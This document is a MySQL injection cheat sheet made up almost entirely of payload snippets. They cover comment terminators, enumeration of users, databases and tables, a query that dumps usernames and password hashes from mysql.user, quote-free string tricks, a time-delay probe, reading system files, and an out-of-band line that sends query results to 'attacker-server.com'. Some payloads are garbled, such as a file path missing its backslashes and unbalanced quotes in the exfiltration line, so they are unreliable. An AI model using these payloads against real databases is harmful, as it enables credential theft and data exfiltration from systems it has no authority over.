MYSQL

Comments

1
2
3
4
#
/* */
-- -
;%00

Version

1
2
3
SELECT VERSION();
SELECT @@VERSION;
SELECT @@GLOBAL.VERSION;

User details

1
2
3
4
5
user()
current_user()
system_user()
session_user()
SELECT user,password FROM mysql.user;

Database details

1
2
3
SELECT db_name();
SELECT database();
SELECT schema_name FROM information_schema.schemata;

Database credentials

1
SELECT host, user, password FROM mysql.user;

Server details

1
SELECT @@hostname;

Table Name

1
SELECT table_name FROM information_schema.tables;

Columns Names

1
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';

No Quotes

1
CONCAT(CHAR(97), CHAR(98), CHAR(99))

String Concatenation

1
CONCAT(foo, bar)

Conditionals

1
SELECT IF(1=1,'true','false');

Time-delay

1
Sleep(10)

Read Files

1
SELECT LOAD_FILE('C:Windowswin.ini');

Out-of-Band Retrieval

1
SELECT LOAD_FILE(concat("\\",(SELECT 1), "attacker-server.com\");

Substrings

1
SELECT substr('Foobar', 1, 1);

Retrieve Nth Line

1
SELECT * FROM table ORDER BY ID LIMIT 3,1